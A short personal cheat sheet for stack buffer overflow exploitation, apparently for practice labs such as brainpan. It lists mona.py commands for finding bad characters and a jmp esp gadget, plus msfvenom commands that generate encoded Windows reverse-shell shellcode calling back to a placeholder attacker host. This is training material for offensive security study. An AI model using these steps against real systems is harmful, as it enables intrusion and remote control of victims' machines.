Buffer Overflow Cheatsheet

A handly list of the most typical commands used in buffer overflows.

Take control of EIP

First, lets use some skeletons to overwrite the EIP

Then, let’s generate a pattern to identify the offset
Todo: complete msfpatterncreate command and msfpatternfind

After getting control of EIP

Set a working folder
!mona config -set workingfolder C:\Users\shroudri\%p

Generate bytearray
!mona bytearray

Generate bytearray excluding a certain badchar
!mona bytearray -cpb "\x00" !mona bytearray -cpb "\x00\x0a\etc"

Compare ESP with generated bytearray to check for badchars automatically
!mona compare -f C:\Users\shroudri\%p\bytearray.bin -a <ESP_ADRESS> #(e.g 00F23930)

Generate revshell with msfvenom

msfvenom -p windows/shell_reverse_tcp -a x86 -e x86/shikata_ga_nai -f c LHOST=insertip LPORT=insrertport -b “\x00” EXITFUNC=thread msfvenom -p windows/shell_reverse_tcp -a x86 -e x86/shikata_ga_nai -f c LHOST=insertip LPORT=insrertport -b "\x00\x0a\xaf" EXITFUNC=thread

List all available programs
!mona modules

Next step: We want to make EIP point to ESP

This command will find an instruction within a program to jump to the ESP (FFE4 == jmp_esp)
!mona find -s "\xFF\xE4" -m brainpan.exe

Because shikata_ga_nai is being used, a few NOPs must be introduced between EIP and Shellcode
NOPS= "x90"*16